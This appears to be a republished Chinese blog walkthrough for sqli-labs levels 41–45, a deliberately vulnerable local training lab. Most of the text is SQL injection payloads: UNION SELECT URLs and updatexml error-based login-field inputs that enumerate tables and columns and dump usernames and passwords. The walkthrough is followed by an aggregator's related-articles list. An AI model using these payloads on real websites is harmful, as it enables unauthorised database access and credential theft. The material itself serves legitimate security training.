sql-labs41-45关通关攻略

第41关

一.查询数据库

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,database()--+icon-default.png?t=N7T8http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,database()--+

二.查表

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+icon-default.png?t=N7T8http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+

三.查列

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+icon-default.png?t=N7T8http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)--+

四.查user表里所有数据

http://127.0.0.1/Less-41/?id=-1%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+

第42关

一.登录页面

二.查询数据库

在密码框里输入
'and updatexml(1,concat(~,(select database()),~),1)

三.查表 

在密码框里输入
'and updatexml(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),~),1) 


 四.查列

在密码框里输入

'and updatexml(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_name='users' ),~),1) 

 第43关

一.登录页面

二. 查询数据库

在密码框里输入
') and updatexml(1,concat(~,(select database()),~),1) 


三.查表名

在密码框里输入
') and updatexml(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),~),1)


 

四.查列


') and updatexml(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_name='users' ),~),1) 

第44关

一.查询数据库

在密码框中输入

1' union select 1,database(),3 #

二.查表

在密码框中输入1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

 

三.查列

在密码框中输入1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' #

 

第45关

一.查询数据库

在密码框中输入1') union select 1,database(),3 #

二.查表

在密码框中输入1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

三.查列

在密码框中输入1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='emails' #

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1522481.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

HTB-sequal(mysql)

HTB-sequal(mysql)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解sequal这台靶机 渗透过程 信息搜集 服务器开放了3306mysql端口思路:mysql爆破-sC参数会执行 相关的默认脚本 连接mysql数据库 通过空密码连接道mysql数据库flag:7b4bec00d1a39…
阅读更多...
本地缓存和分布式缓存有何区别?

本地缓存和分布式缓存有何区别?

缓存是提高服务性能的一把利剑,尤其在高并发、高请求量的服务中性能提升明显。如果后端服务只靠关系型数据库提供支撑,系统会很快达到处理瓶颈。缓存设计无处不在,通常来说可以分为本地缓存与分布式缓存。本地缓存框架主要有Guava cache、Caf…
阅读更多...
Java基础——自学习使用(反射)

Java基础——自学习使用(反射)

一、反射的定义 反射是java基础的核心,反射是获取类信息的能力。类信息包括:方法、变量、接口、父类、构造器、类名等。 Java的反射(Reflection)是一种强大的机制,它允许程序在运行时检查或修改类、接口、字段以及方法…
阅读更多...
【书生大模型实战营】MindSearch CPU-only 版部署

【书生大模型实战营】MindSearch CPU-only 版部署

MindSearch CPU-only 版部署 MindSearch CPU-only 版部署任务步骤 MindSearch CPU-only 版部署 任务 将 MindSearch 部署到 HuggingFace 并美化 Gradio 的界面,并提供截图和 Hugging Face 的Space的链接。 步骤 按照官方教程,实现在网页上打开MindSe…
阅读更多...
Java中等题-盛最多水的容器(力扣)

Java中等题-盛最多水的容器(力扣)

给定一个长度为 n 的整数数组 height 。有 n 条垂线,第 i 条线的两个端点是 (i, 0) 和 (i, height[i]) 。 找出其中的两条线,使得它们与 x 轴共同构成的容器可以容纳最多的水。 返回容器可以储存的最大水量。 说明:你不能倾斜容器。 我一开…
阅读更多...
继电器实现上下电

继电器实现上下电

一、依赖库 import serial 二、代码 import serialdef batonoff(com,status):继电器开关:param status::return:ser serial.Serial(com, baudrate9600, timeout0.1)if ser.is_open:if status "on":ser.write(data[0xA0, 0x01, 0x01, 0xA2])print(打开继电器)els…
阅读更多...
Nginx负载均衡数据流分析

Nginx负载均衡数据流分析

1、各机器ip信息 客户端IP:192.168.3.239 Nginx代理服务器IP:192.168.3.241 服务端IP:192.168.3.238 2、架构图(略) 3、 下图是在服务端上面的抓包分析。 下图是在客户端上面的抓包分析: 下图是在代理服务…
阅读更多...
Python基础笔记

Python基础笔记

一、python基础1.1 基础知识1.1.1 注释 注释:在程序中对程序代码进行解释说明的文字。 作用:注释不是程序,不能被执行,只是对程序代码进行解释说明,让别人可以看懂程序代码的作用,能够大大增强程序的可读性…
阅读更多...
【数论 状态机dp】2572. 无平方子集计数

【数论 状态机dp】2572. 无平方子集计数

本文涉及知识点 C动态规划 数论 质数、最大公约数、菲蜀定理 LeetCode 2572. 无平方子集计数 给你一个正整数数组 nums 。 如果数组 nums 的子集中的元素乘积是一个 无平方因子数 ,则认为该子集是一个 无平方 子集。 无平方因子数 是无法被除 1 之外任何平方数整…
阅读更多...
数据结构,单向链表

数据结构,单向链表

数据结构是计算机科学中的一个核心概念,它研究的是数据的组织、管理和存储方式,以及在这些数据上进行操作时的算法。数据结构为数据的高效访问和修改提供了基础。 数组(Array):一种线性数据结构,可以存储固…
阅读更多...
开源 AI 智能名片 O2O 商城小程序:引入淘汰机制,激发社交电商新活力

开源 AI 智能名片 O2O 商城小程序:引入淘汰机制,激发社交电商新活力

摘要:本文深入探讨在社交电商领域中,开源 AI 智能名片 O2O 商城小程序如何通过设置淘汰机制,实现“良币驱逐劣币”,激励士气,为社交电商企业注入新的活力。通过分析缺乏淘汰机制的弊端以及设置淘汰机制的优势&#xff…
阅读更多...
一篇入门C语言【文件】

一篇入门C语言【文件】

本科期间C语言的课本无论哪个版本都会有【文件】这一章节,不过好多学校基本上不讲或者就出一道选择题,讲得很浅,今天这篇详细总结一下这部分的知识~ 一.原理解析 文件是指存在在外部介质(如磁盘、磁带)上的数据集合。操…
阅读更多...
NPDP|如何在传统行业中做好产品管理的策略与建议

NPDP|如何在传统行业中做好产品管理的策略与建议

在当今这个快速变化的数字时代,传统行业面临着前所未有的挑战与机遇。产品管理作为连接市场需求与企业生产的核心环节,其重要性不言而喻。对于传统行业而言,做好产品管理不仅意味着保持竞争力,更是实现转型升级、拥抱未来的关键。…
阅读更多...
【类模板】成员函数模板

【类模板】成员函数模板

一、成员函数模板的基本含义 不管是普通的类&#xff0c;还是类模板&#xff0c;都可以为其定义成员函数模板&#xff0c;以下的情况就是类模板和成员函数模板都有各自独立的一套参数&#xff1a; template<typename T1> class A { public:T1 m_ic;static constexpr int…
阅读更多...
0.3 学习Stm32经历过的磨难

0.3 学习Stm32经历过的磨难

文章目录 用库函数传参 能否按位或STM32库函数XXX_GetFlagStatus和XXX_GetITStatus的区别 用库函数传参 能否按位或 答案是看清况&#xff0c;而不是一股脑的写&#xff01;&#xff08;血泪的经验啊&#xff09; 可行的情况&#xff1a; //如gpio初始化结构体中的gpiopin参…
阅读更多...
c++list

c++list

list介绍 list是序列容器&#xff0c;允许对序列中任意位置的恒定时间插入和擦除操作&#xff0c;以及双向迭代。 list容器被实现为双向链表;双向链表可以将它们包含的每个元素存储在不同且不相关的存储位置。 list的使用 list中的接口比较多&#xff0c;此处类似&#xff0…
阅读更多...
RedisStack十部曲之二:Redis的核心概念

RedisStack十部曲之二:Redis的核心概念

文章目录 键空间修改和查询键键过期遍历键空间 客户端缓存在计算机科学中有两个难题客户端缓存的Redis实现跟踪模式的工作机制统一的键命名空间 两种连接方式缓存策略Opt-in 模式Opt-out 模式广播模式NOLOOP选项避免竟态条件当与服务器失去连接怎么办什么值得缓存 流水线请求/响…
阅读更多...
使用QTcpSocket在两台ubuntu之间实现通讯

使用QTcpSocket在两台ubuntu之间实现通讯

重点提取&#xff1a; 1.保证服务端和客户端端口号一致 2.保证服务端和客户端在同一网段(可以通过网线连接) 3保证客户端界面输入的ip是服务段的ip 实现步骤&#xff1a; 首先&#xff0c;构造服务端界面和客户端界面如下 服务端界面 客户端界面 其次具体代码 在.pro文件…
阅读更多...
FRP内网穿透与神卓互联,优势对比

FRP内网穿透与神卓互联,优势对比

本文介绍分析了当前市面上两款常用的内网穿透工具 frp内网穿透介绍 一、概述 frp&#xff08;Fast Reverse Proxy&#xff09;是一款高性能的反向代理应用&#xff0c;主要用于实现内网穿透功能。通过frp&#xff0c;用户可以将内网中的服务器或服务暴露到公网上&#xff0c;…
阅读更多...
【ACM独立出版|EI快检索-高录用|IEEE Fellow支持】2024年数字经济与计算机科学国际学术会议(DECS2024)

【ACM独立出版|EI快检索-高录用|IEEE Fellow支持】2024年数字经济与计算机科学国际学术会议(DECS2024)

【ACM独立出版&#xff5c;EI快检索-高录用&#xff5c;IEEE Fellow支持】 2024年数字经济与计算机科学国际学术会议&#xff08;DECS2024&#xff09; *ACM独立出版&#xff0c;快检索&#xff0c;高录用 *见刊后1个月左右完成EI&Scopus检索 *国内211大学、世界QS名校…
阅读更多...
最新文章

Copyright @ 2022~2023